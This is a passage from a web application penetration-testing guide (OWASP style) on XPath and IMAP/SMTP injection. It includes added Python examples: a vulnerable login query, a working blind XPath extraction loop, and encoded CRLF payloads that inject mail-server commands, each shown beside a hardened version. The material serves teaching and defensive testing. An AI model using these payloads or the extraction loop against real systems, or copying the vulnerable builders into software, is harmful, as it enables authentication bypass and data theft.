Web Application Penetration Testing
string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())

If the application does not properly filter user input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password: ' or '1' = '1

Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())
As in a common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if neither a valid username nor a valid password has been provided. And as in a common SQL Injection attack, the first step in testing for XPath injection is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the internal details of the XML data and the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack, whose goal is to reconstruct the whole data structure. The technique is similar to inference-based SQL Injection: the approach is to inject code that creates a query that returns one bit of information per request. Blind XPath Injection is explained in more detail by Amit Klein in the referenced paper.
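The following is an added example (it is not part of the OWASP guide) that builds the login query discussed above in both the vulnerable and a hardened form and, when lxml is installed, evaluates it against a constructed user store. The sample XML, the `x' or ... or 'a'='b` payload shape and the `name(/*[1])` extraction target are assumptions made for this demo; the blind loop implements the one-bit-per-request approach described in the text, not Amit Klein's paper verbatim.

```python
"""XPath injection in the login query: vulnerable string building, the
concat()-based literal quoting that prevents it, and a blind (one bit per
request) extraction loop.  Added example; the user store, payload shape and
the name(/*[1]) target are constructed for this demo."""
from typing import Callable, Optional

try:
    from lxml import etree  # only needed to actually evaluate the queries
    HAVE_LXML = True
except ImportError:
    HAVE_LXML = False

# Constructed sample document in the shape the page's query assumes.
USERS_XML = b"""<?xml version="1.0"?>
<users>
  <user><username>gandalf</username><password>!c3</password><account>admin</account></user>
  <user><username>frodo</username><password>ring</password><account>user</account></user>
</users>"""

TEMPLATE = "string(//user[username/text()={u} and password/text()={p}]/account/text())"


def build_query_vulnerable(username: str, password: str) -> str:
    """The page's pattern: raw input pasted between single quotes."""
    return TEMPLATE.format(u=f"'{username}'", p=f"'{password}'")


def xpath_literal(value: str) -> str:
    """Encode any string as an XPath 1.0 literal.  XPath 1.0 has no quote
    escape, so a value holding both quote kinds is split on the single quotes
    and rebuilt with concat(), each quote becoming the double-quoted literal "'"."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")
    return pieces[0] if len(pieces) == 1 else "concat(" + ", ".join(pieces) + ")"


def build_query_safe(username: str, password: str) -> str:
    """Same query, but the input can never break out of its literal."""
    return TEMPLATE.format(u=xpath_literal(username), p=xpath_literal(password))


def authenticate(query: str) -> Optional[str]:
    """Evaluate the query against the sample store: the selected account name,
    '' when no user matches, None when lxml is not installed."""
    if not HAVE_LXML:
        return None
    return str(etree.fromstring(USERS_XML).xpath(query))


def login_oracle(username: str, password: str) -> bool:
    """The single bit a blind attacker observes: did the login succeed?"""
    if not HAVE_LXML:
        raise RuntimeError("lxml is required to evaluate the XPath oracle")
    return authenticate(build_query_vulnerable(username, password)) != ""


def blind_payload(condition: str) -> str:
    """Username that makes the predicate's truth depend only on `condition`.
    Because 'and' binds tighter than 'or', the query's trailing
    "and password/text()='x'" attaches to the always-false 'a'='b' only."""
    return f"x' or {condition} or 'a'='b"


def blind_extract(oracle: Callable[[str, str], bool], target: str,
                  alphabet: str, max_len: int = 64) -> str:
    """Recover the string value of the XPath expression `target` one character
    at a time, asking the oracle a single yes/no question per request."""
    for n in range(1, max_len + 1):
        if oracle(blind_payload(f"string-length({target})={n}"), "x"):
            length = n
            break
    else:
        raise ValueError("length not found within max_len")
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = f"substring({target},{pos},1)={xpath_literal(ch)}"
            if oracle(blind_payload(cond), "x"):
                recovered += ch
                break
        else:
            raise ValueError(f"no alphabet character matched at position {pos}")
    return recovered


if __name__ == "__main__":
    inj = "' or '1' = '1"
    print(build_query_vulnerable(inj, inj))
    print(build_query_safe(inj, inj))
    if HAVE_LXML:
        print("vulnerable login ->", authenticate(build_query_vulnerable(inj, inj)))
        print("hardened login   ->", repr(authenticate(build_query_safe(inj, inj))))
        print("root element     ->", blind_extract(login_oracle, "name(/*[1])",
                                                   "abcdefghijklmnopqrstuvwxyz"))
```

The concat() quoting is the portable fix when the XPath engine offers nothing better; where the engine supports variable binding (lxml, for instance, accepts `xpath("//user[username/text()=$u]", u=username)`), binding the values as variables is preferable to building the literal at all. The blind loop shows why the error-message check in the text matters so little to a patient tester: with nothing but a yes/no login result it still recovers the root element name, and the same loop works for any string-valued expression.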
References

Whitepapers

• Amit Klein: "Blind XPath Injection" - http://www.modsecurity.org/archive/amit/blind-xpathinjection.pdf
• XPath 1.0 specifications - http://www.w3.org/TR/xpath
Testing for IMAP/SMTP Injection (OTG-INPVAL-011)

Summary

This threat affects all applications that communicate with mail servers (IMAP/SMTP), generally webmail applications. The aim of this test is to verify the capacity to inject arbitrary IMAP/SMTP commands into the mail servers, due to input data not being properly sanitized.

The IMAP/SMTP Injection technique is more effective if the mail server is not directly accessible from the Internet. Where full communication with the backend mail server is possible, it is recommended to conduct direct testing instead.
An IMAP/SMTP Injection makes it possible to access a mail server which otherwise would not be directly accessible from the Internet. In some cases, these internal systems do not have the same level of infrastructure security and hardening that is applied to the front-end web servers. Therefore, mail servers may be more vulnerable to attacks by end users (see the scheme presented in Figure 1).

[Figure 1: Webmail traffic flow. Webmail user (1), Internet, public zone with the webmail application (2, 3), private zone (hidden servers) with the mail servers.]

Figure 1 depicts the flow of traffic generally seen when using webmail technologies. Steps 1 and 2 are the user interacting with the webmail client, whereas step 2' is the tester bypassing the webmail client and interacting with the back-end mail servers directly.
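The following is an added example (not part of the OWASP guide) of the defect this test looks for: a webmail front end that pastes a URL parameter into the IMAP or SMTP command it relays to the hidden mail server. The parameter names, the `FETCH`/`RCPT TO` templates and the payloads are constructed for this demo; `split_commands` models only the fact that the mail server treats every CRLF as the end of one command.

```python
"""IMAP/SMTP command injection through webmail parameters: the vulnerable
command building beside a validated version, plus a model of how many commands
the mail server actually receives.  Added example; templates, parameter names
and payloads are constructed for this demo."""
import re
from typing import List
from urllib.parse import unquote

CRLF = "\r\n"


def split_commands(stream: str) -> List[str]:
    """What the mail server does with the bytes the webmail relays: every
    CRLF terminates one command, so an injected CRLF starts a new one."""
    return [line for line in stream.split(CRLF) if line]


def imap_fetch_vulnerable(tag: str, msg_id_param: str) -> str:
    """Pattern under test: the URL-decoded message id from the request is
    pasted straight into the IMAP command sent to the back-end server."""
    return f"{tag} FETCH {unquote(msg_id_param)} BODY[HEADER]{CRLF}"


def smtp_rcpt_vulnerable(address_param: str) -> str:
    """Same defect on the sending path: a recipient taken from the compose form."""
    return f"RCPT TO:<{unquote(address_param)}>{CRLF}"


def require_no_crlf(value: str, name: str) -> str:
    """Reject the characters that would terminate the current command."""
    if "\r" in value or "\n" in value:
        raise ValueError(f"{name}: CR/LF not allowed")
    return value


def imap_fetch_safe(tag: str, msg_id_param: str) -> str:
    """Hardened: a message sequence number is digits only, so anything else
    (an encoded CRLF included) is rejected before a command is built."""
    msg_id = unquote(msg_id_param)
    if not re.fullmatch(r"[1-9][0-9]*", msg_id):
        raise ValueError("message id must be a positive integer")
    return f"{tag} FETCH {msg_id} BODY[HEADER]{CRLF}"


def smtp_rcpt_safe(address_param: str) -> str:
    """Hardened: no control characters, and a deliberately strict
    local@domain shape (an assumption for this example, not a full RFC 5321 check)."""
    address = require_no_crlf(unquote(address_param), "recipient")
    if not re.fullmatch(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", address):
        raise ValueError("recipient is not a plain mailbox address")
    return f"RCPT TO:<{address}>{CRLF}"


# Constructed tester inputs for the webmail parameters.  %0d%0a is a
# URL-encoded CRLF; everything after it becomes a command of the tester's choice.
IMAP_PAYLOAD = "1%20BODY[HEADER]%0d%0aA002%20LIST%20%22%22%20*%0d%0aA003%20FETCH%201"
SMTP_PAYLOAD = "alice@example.org%3E%0d%0aRCPT%20TO:%3Cmallory@example.net"


if __name__ == "__main__":
    for cmd in split_commands(imap_fetch_vulnerable("A001", IMAP_PAYLOAD)):
        print("IMAP server sees:", cmd)
    for cmd in split_commands(smtp_rcpt_vulnerable(SMTP_PAYLOAD)):
        print("SMTP server sees:", cmd)
    for builder, arg in ((lambda p: imap_fetch_safe("A001", p), IMAP_PAYLOAD),
                         (smtp_rcpt_safe, SMTP_PAYLOAD)):
        try:
            builder(arg)
        except ValueError as exc:
            print("hardened builder rejected payload:", exc)
```

The vulnerable IMAP builder turns one intended `FETCH` into three server-side commands, one of which (`LIST "" *`) enumerates every mailbox the authenticated account can see; the SMTP builder adds a second recipient. Both hardened builders refuse the input before any command is constructed, which is the check a tester should expect to hit when probing a parameter with an encoded CRLF.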
This technique allows a wide variety of actions and attacks. The possibilities depend on the type and scope of injection and the mail server technology being tested.

Some examples of attacks using the IMAP/SMTP Injection technique are: